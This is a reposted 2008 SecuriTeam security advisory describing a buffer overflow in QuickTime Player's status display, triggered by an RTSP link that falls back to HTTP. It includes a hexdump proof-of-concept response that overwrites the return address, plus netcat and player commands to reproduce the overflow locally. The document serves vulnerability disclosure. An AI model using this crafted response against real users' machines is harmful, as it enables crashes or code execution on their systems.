Search This Blog

Friday, January 11, 2008

[NT] Quicktime Player Buffer Overflow (LCD, RTSP)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

Quicktime Player Buffer Overflow (LCD, RTSP)
------------------------------------------------------------------------


SUMMARY

<http://www.apple.com/quicktime> Quicktime is "a well known media player
developed by Apple". QuickTime appears to have a buffer-overflow which
happens during the filling of the LCD-like screen containing information
about the status of the connection.

DETAILS

Vulnerable Systems:
* Quicktime Player versions 7.3.1.70 and prior

To exploiting this vulnerability is only needed that an user follows a
rtsp:// link, if the port 554 of the server is closed Quicktime will
automatically change the transport and will try the HTTP protocol on port
80, the 404 error message of the server (other error numbers are valid
too) will be visualized in the LCD-like screen.

During Luigi's tests he has been able to fully overwrite the return
address anyway note that the visible effects of the vulnerability could
change during the usage of the debugger (in attaching mode it's everything
ok).

Exploit:
(content of <http://aluigi.org/poc/quicktimebof.txt>

http://aluigi.org/poc/quicktimebof.txt)
0000000 5448 5054 312f 312e 3420 3430 0120 0101
0000010 0101 0101 0101 0101 0101 0101 0101 0101
*
00005a0 4141 4141 4141 4141 4141 4141 4141 4141
*
0000790 4141 5841 5858 4158 4141 4141 4141 4141
00007a0 4141 4141 4141 4141 4141 4141 4141 4141
*
00008b0 4141 4141 4141 4141 0141 0101 0101 0101
00008c0 0101 0101 0101 0101 0101 0101 0101 0101
*
0000c10 0101 7801 0d79 0d0a 000a
0000c19

Use it with:
nc -l -p 80 -v -v -n < quicktimebof.txt

and then run:
QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/quicktimebof-adv.txt>

http://aluigi.altervista.org/adv/quicktimebof-adv.txt

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: